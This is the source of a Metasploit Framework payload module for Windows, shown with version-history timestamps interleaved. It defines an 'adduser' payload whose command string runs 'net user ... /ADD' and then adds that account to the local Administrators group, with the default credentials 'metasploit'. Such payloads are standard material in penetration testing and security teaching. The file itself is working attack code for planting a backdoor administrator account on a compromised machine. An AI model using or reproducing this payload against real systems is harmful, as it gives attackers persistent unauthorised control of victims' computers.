2007-02-18 00:10:39 +00:00
|
|
|
##
|
2008-10-02 05:23:59 +00:00
|
|
|
# $Id$
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
##
|
2010-04-30 08:40:19 +00:00
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
2007-02-18 00:10:39 +00:00
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
2009-04-13 14:33:26 +00:00
|
|
|
# http://metasploit.com/framework/
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
2005-07-11 05:15:30 +00:00
|
|
|
require 'msf/core'
|
2006-02-21 03:10:58 +00:00
|
|
|
require 'msf/core/payload/windows/exec'
|
2005-07-11 05:15:30 +00:00
|
|
|
|
|
|
|
|
|
|
|
###
|
|
|
|
#
|
|
|
|
# Extends the Exec payload to add a new user.
|
|
|
|
#
|
|
|
|
###
|
2008-10-02 05:23:59 +00:00
|
|
|
module Metasploit3
|
2005-07-11 05:15:30 +00:00
|
|
|
|
2006-02-21 03:10:58 +00:00
|
|
|
include Msf::Payload::Windows::Exec
|
2005-07-11 05:15:30 +00:00
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Windows Execute net user /ADD',
|
|
|
|
'Version' => '$Revision$',
|
|
|
|
'Description' => 'Create a new user and add them to local administration group',
|
|
|
|
'Author' => 'hdm',
|
2006-01-21 22:10:20 +00:00
|
|
|
'License' => MSF_LICENSE,
|
2005-07-11 05:15:30 +00:00
|
|
|
'Platform' => 'win',
|
2005-07-13 18:54:41 +00:00
|
|
|
'Arch' => ARCH_X86,
|
2005-07-11 05:15:30 +00:00
|
|
|
'Privileged' => true))
|
|
|
|
|
|
|
|
# Register command execution options
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('USER', [ true, "The username to create", "metasploit" ]),
|
2009-09-10 03:29:51 +00:00
|
|
|
OptString.new('PASS', [ true, "The password for this user", "metasploit" ]),
|
2008-10-02 05:23:59 +00:00
|
|
|
], self.class)
|
2005-07-11 05:21:19 +00:00
|
|
|
|
|
|
|
# Hide the CMD option...this is kinda ugly
|
|
|
|
deregister_options('CMD')
|
2005-07-11 05:15:30 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Override the exec command string
|
|
|
|
#
|
|
|
|
def command_string
|
|
|
|
user = datastore['USER'] || 'metasploit'
|
|
|
|
pass = datastore['PASS'] || ''
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2009-09-10 03:29:51 +00:00
|
|
|
if(pass.length > 14)
|
|
|
|
raise ArgumentError, "Password for the adduser payload must be 14 characters or less"
|
2010-04-30 08:40:19 +00:00
|
|
|
end
|
2005-07-11 05:15:30 +00:00
|
|
|
|
|
|
|
return "cmd.exe /c net user #{user} #{pass} /ADD && " +
|
|
|
|
"net localgroup Administrators #{user} /ADD"
|
|
|
|
end
|
|
|
|
|
2009-09-10 03:29:51 +00:00
|
|
|
end
|